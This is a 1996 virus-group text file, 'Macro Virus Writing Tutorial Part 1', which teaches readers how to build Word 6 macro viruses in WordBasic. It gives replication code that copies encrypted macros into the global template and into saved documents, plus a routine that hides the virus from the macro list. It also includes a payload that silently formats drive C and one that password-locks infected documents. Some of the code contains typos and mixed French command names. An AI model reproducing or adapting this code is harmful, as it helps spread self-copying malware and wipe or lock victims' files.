*************************** * THE MACRO VIRUS * * WRITING TUTORIAL * * PART 1 * *************************** * * * WRITTEN BY DARK NIGHT * * OF VBB * * * *************************** LEGALESE -------- I SHALL NOT BE HELD RESPONSIBLE FOR ANY DAMAGE CREATED BE DIRECT OR INDIRECT USE OF THE PUBLICISED MATERIAL. THIS DOCUMENT IS COPYRIGHT 1996 TO ME, DARK NIGHT OF VBB. HEREWITH I GRANT ANYBODY LICENSE TO REDISTRIBUTE THIS DOCUMENT AS LONG AS IT IS KEPT IN WHOLE AND MY COPYRIGHT NOTICE IS NOT REMOVED. ALSO IF I FIND ANY LAMERS WHO JUST TAKE THE CODE PUBLISHED HERE AND SAY IT IS THEIR OWN I WILL SEE THAT THEY'LL BE PUNISHED.(BELIEVE IT OR NOT :-))!!! INTRODUCTION ------------- MANY OF YOU MAY BE WONDERING RIGHT NOW WHO THE HELL I AM AND WHO VBB IS. COME ON LAMERS! GET ALIVE. VBB IS ONE OF THE COOLEST VIRUS GROUPS AROUND. YOU CAN'T TELL ME YOU'VE NEVER HEARD OF US. WELL, OK I'LL ADMIT IT. WE'RE NOT THAT POPULAR YET, BUT THAT'LL COME. SO FOR NOW HERE'S MY CONTRIBUTION TO THE GROUP AS THE LEADER. WELCOME TO THE MACRO VIRUS WRITING TUTORIAL PART 1! ENJOY!! THE TOOLS ---------- FIRST OF ALL YOU'LL NEED MS WORD 6.0 OR UP(DUH), THEN YOU MAY WANT TO GET VBB'S MACRO DISASSEMBLER BY AURODREPH SO THAT YOU CAN STUDY ENCRYPTED MACROS. ALSO YOU SHOULD MAKE BACK-UPS OF YOUR NORMAL.DOT TEMPLATE IN YOUR WINWORD6\TEMPLATE\ DIRECTORY, AS THIS IS THE DOCUMENT COMMONLY INFECTED BY MACRO VIRII. SO WHATCH OUT. ALSO I RECOMMEND TO HAVE AT LEAST A SMALL KNOWLEDGE OF WORD BASIC, SO THAT YOU KIND A KNOW WHAT'S GOING ON. WELL, THAT'S IT. YOU'VE MADE IT THIS FAR. IT'S NOW TIME TO GET INTO THE MACRO VIRUS GENERALS. THE GENERAL STUFF ----------------- MOST MACRO VIRII HAVE A PRETTY SET STRUCTURE. THEY START OF WITH AN AUTO-EXECUTING MACRO WHICH INFECTS THE NORMAL.DOT(GLOBAL) TEMPLATE. THEN THEY HAVE SOME MACROS WHICH WILL INFECT THE FILES ON CERTAIN ACTIONS. FOR EXAMPLE FileSaveAs, FileSave, FileOpen, ToolsMacros. DOCUMENTS ARE INFECTED THROUGH TRANSFERRING THE MACROS INTO THE DOCUMENT AND HAVING THEM EXECUTE THE NEXT TIME THE DOCUMENT IS OPENED. A CODE FOR THE AUTOEXEC ROUTINE WOULD LOOK SOMETHING LIKE THIS: 'ANYTHING AFTER THE ' ARE MY COMMENTS Sub MAIN On Error Goto Abort iMacroCount = CountMacros(0, 0) 'CHECK TO SEE IF INFECTION EXISTS For i = 1 To iMacroCount If MacroName$(i, 0, 0) = "PayLoad" Then bInstalled = - 1 'BY LOOKING FOT THE PAYLOAD MACRO End If If MacroName$(i, 0, 0) = "FileSaveAs" Then bTooMuchTrouble = - 1 'BUT IF THE FILESAVEAS MACRO EXISTS THEN INFECTION IS 'TOO DIFICULT. End If Next i If Not bInstalled And Not bTooMuchTrouble Then 'add FileSaveAs and copies of AutoExec and FileSaveAs. 'Payload has no use except to check for infection. 'The ,1 encrypts all macros in their destination making 'them unreadble in Word. iWW6IInstance = Val(GetDocumentVar$("WW6Infector")) sMe$ = FileName$() Macro$ = sMe$ + ":PayLoad" MacroCopy Macro$, "Global:PayLoad", 1 Macro$ = sMe$ + ":FileOpen" MacroCopy Macro$, "Global:FileOpen", 1 Macro$ = sMe$ + ":FileSaveAs" MacroCopy Macro$, "Global:FileSaveAs", 1 Macro$ = sMe$ + ":AutoExec" MacroCopy Macro$, "Global:AutoExec", 1 SetProfileString "WW6I", Str$(iWW6IInstance + 1) End If Abort: End Sub THE SaveAs ROUTINE ------------------ THIS IS THE ROUTINE WHICH COPIES THE MACRO VIRUS INTO THE ACTIVE DOCUMENT WHEN IT IS SAVED USING FILE/SAVE AS. IT USES MUCH OF THE SAME TECHNIQUES AS THE AutoExec ROUTINE. HERE'S WHAT THE CODE SHOULD LOOK LIKE FOR THE SaveAs ROUTINE: 'YOU CAN ALWAYS USE THE ,1 AGAIN TO ENCRYPT MACROS. Sub MAIN Dim dlg As FileSaveAs GetCurValues dlg Dialog dlg If (Dlg.Format = 0) Or (dlg.Format = 1) Then MacroCopy "FileSaveAs", WindowName$() + ":FileSaveAs" MacroCopy "FileSave ", WindowName$() + ":FileSave" MacroCopy "PayLoad", WindowName$() + ":PayLoad" MacroCopy "FileOpen", WindowName$() + ":FileOpen" Dlg.Format = 1 End If FileDaveAs dlg End Sub SHORT, BUT IT WORKS WELL. ALL THIS INFO, BELIEVE IT OR NOT, IS ENOUGH TO MAKE A SMALL AND BASIC MACRO VIRUS. SPECIAL ROUTINES ---------------- THERE ARE SEVERAL METHODS WHICH CAN BE USED TO HIDE YOUR VIRUS OR MAKE IT MORE EFFECTIVE. FOR EXAMPLE, YOU CAN MAKE A MACRO TO HIDE YOUR VIRUS WHEN SOMEBODY LOOKS IN TOOLS/MACRO. THE CODE SHOULD LOOK SOMETHING LIKE THIS: Sub MAIN On Error Goto ErrorRoutine OldName$ = NomFichier$() If macros.bDebug Then MsgBox "start ToolsMacro" Dim dlg As OutilsMacro If macros.bDebug Then MsgBox "1" GetCurValues dlg If macros.bDebug Then MsgBox "2" On Error Goto Skip Dialog dlg OutilsMacro dlg Skip: On Error Goto ErrorRoutine End If REM enable automacros DisableAutoMacros 0 macros.SavToGlobal(OldName$) macros.objectiv Goto Done ErrorRoutine: On Error Goto Done If macros.bDebug Then MsgBox "error " + Str$(Err) + " occurred" End If Done: End Sub ALSO YOU CAN INCLUDE EXERNAL SUBROUTINES. FOR EXAMPLE, THE NUCLEAR VIRUS TRIES TO COMPILE AND RUN AN EXTERNAL FILE-INFECTOR VIRUS. OR SOME MACRO TROJANS TRY TO FORMAT YOUR HARDDRIVE WHEN YOU OPEN A DOCUMENT. AN EXAMPLE SUBROUTINE FOR AN UNCONDITIONAL FORMAT WOULD BE THIS: sCmd$ = "echo y|format c: /u" Shell Environment$ ("COMSPEC") + "/c" + sCmd$, 0 ALSO YOU MAY WANT TO PUT A PASSWORD ONTO THE DOCUMENT THAT YOU'VE JUST INFECTED OR WHEN YOU HAVE EXPERIENCED AN ERROR WHILE INFECTING AND THE CURRENT SECOND IS 13. TAKE A LOOK AT THIS EXAMPLE: Sub MAIN On Error Goto ByeBye . . 'Infection code . . . \/ ByeBye: If (second(Now()) = 13) Then Dlg.Password = "Dark_Night" 'SETS PASSWORD TO DARK_NIGHT. YOU CAN 'ALSO SET A RANDOM PASSWORD CODE SHALL 'PRESENTED IN NEXT INSTALLMENT! :-D YOUR WORK --------- I HAVE EXPLAINED THE BASIC KNOWLEDGE YOU NEED TO HAVE TO START WRITING YOUR MACRO VIRUS. IF ANYBODY RESPONDS TO THIS TUTORIAL, THEN I WILL GO INTO MORE DETAILS ABOUT THE DIFFERENT STRUCTURES AND POSSIBILLITIES OF MACRO VIRII. INTERESTED? ----------- I HAVE NO IDEA IF ANYBODY WOULD BE INTERESTED IF I CONTINUE THIS TUTORIAL. SO TO NOT MAKE MYSELF DO ALL THE WORK FOR NOTHING, I REQUEST THAT YOU PLEASE DROP ME AN E-MAIL IF YOU WOULD BE INTERESTED IN ANY FURTHER EXPLINATION OF MACRO VIRII. I WILL THEN GLADLY CONTINUE THIS TUTORIAL OF MACRO VIRII FOR YOU. MY ADDRESS IS: Dark_Night@ilf.net Dark Night